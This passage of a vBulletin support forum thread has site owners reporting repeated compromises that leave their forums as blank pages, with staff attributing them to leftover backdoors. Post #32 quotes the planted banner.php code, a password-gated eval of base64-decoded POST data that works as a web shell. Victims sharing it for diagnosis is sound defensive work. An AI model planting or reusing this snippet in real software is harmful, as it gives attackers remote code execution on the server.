No announcement yet.

Help. Both forum and admin panel just show white page

  • Filter
  • Time
  • Show
Clear All
new posts

  • #31
    Can you or your host determine how the files are being altered?


    • #32
      Well, it was perfectly fine for 2 days after cleaning up everything and I even left the plugin system "Disabled" through config file. Now the site is blank white pages again and banner.php was uploaded again (already had this and the other files deleted) with the code:

      if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
      eval (base64_decode($_POST["php"]));

      And now a lot of the pages have the base64 again. So we can knock off Custom Modifications / Plugins off this list.

      Their host is not cooperating and saying they don't support third party scripts.
      I'm looking at "Last Modified" date and it seems to not change to the newest date they did it, even with these code modifications.


      • #33
        I just had to deal with this too, in fact.....still am. I sure hope Vbulletin is looking real hard at this issue. Once they got in via our forum, I found additional php files in the root of my public_html folder. A uploader php file, pawn3d php file and a database php file. Also, a Story php file in the forums root.

        VBulletin, are you looking into this??


        • #34
          At this time these is still no known exploit causing this issue- it seems to be people affected by the old "install" folder hack that were never cleaned up properly. That is to say backdoors were left in plugins and/or in directories on the server and were left dormant until recently. If we determine there is any unknown exploit we will take action quickly,


          • #35
            I have been hacked with this same exploit 8 times over the last 2 months. I am on 4.2.2. I have 5 different websites on the same host. The only site that is being hacked is the one running VBulliten. In my mind it is safe to assume VB has been very insecure since the install folder exploit and hasn't become any better. I have no new admin account, I have no installed any plugins recently. I have to change all my passwords and clean my site weekly.

            There is no way I can continue paying for this software and upgrade to 5. I have lost all faith in VB. It was a good run boys but time to move on to something more secure.


            • #36
              You changed all your passwords? FTP, CPanel, vBulletin? You placed .htaccess on your admincp directory? Are you running vBSEO? If so, I suggest removing it immediately.

              If you continue to get attacked, there is a backdoor on your server somewhere. Most likely placed during the initial attack. Did you go through all the steps in the "Securing your site thread". As stated in that thread, skipping one can leave you vulnerable to future attacks.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud customization and demonstration site.
              vBulletin 5 Documentation - Updated every Friday. Report issues here.
              vBulletin 5 API - Full / Mobile
              I am not currently available for vB Messenger Chats.


              • #37
                I have changed all those passwords. I have not moved my htaccess file. I am not running a vbSOE.

                That thread was the first thing I went through. I have been running the queries and running greps for the infected files. Clearly there is some type of backdoor. Problem is finding and removing it. Unfortunately I was away for a couple months so any backups of a clean site are long gone for me and I fear the issue is in my database which I absolutely cannot afford to lose.

                TheLastSuperman has some other things I can try in his thread. Hopefully something will work so I can at least get to the point of migrating my database to something stable. I find it hard to believe there has been no acknowledgement from VB on this issue. It has to be kicking sales in the nuts having a new major hack for the software every couple months.


                • #38
                  I am just reinstalling my forum for about the 8th time and will be calling support shortly

                  Same problem keeps occurring and I have followed the instructions to the letter each time.


                  • #39
                    dupe post


                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.